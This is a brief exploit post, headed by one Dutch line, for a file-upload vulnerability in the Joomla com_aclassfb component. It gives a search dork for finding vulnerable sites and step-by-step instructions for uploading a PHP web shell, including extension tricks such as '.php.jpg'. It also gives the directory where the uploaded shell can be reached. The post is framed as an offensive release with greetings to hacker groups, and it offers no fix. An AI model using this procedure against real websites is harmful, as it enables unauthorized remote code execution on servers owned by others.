Er is een kwetsbaarheid in het Aclassfb component ontdekt.
Explot details:
- Title : Joomla com_aclassfb File Upload Vulnerability
- Category : Web Applications
- Type : PHP
- Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
- Tested : Mozila, Chrome, Opera -> Windows & Linux
- Vulnerabillity : File Upload
- Dork : inurl:com_aclassfb
File Upload: http://127.0.0.1/index.php?option=com_aclassfb
Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC :
- Select Category
- After Select Category, Click “Post New Ad” http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
- Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/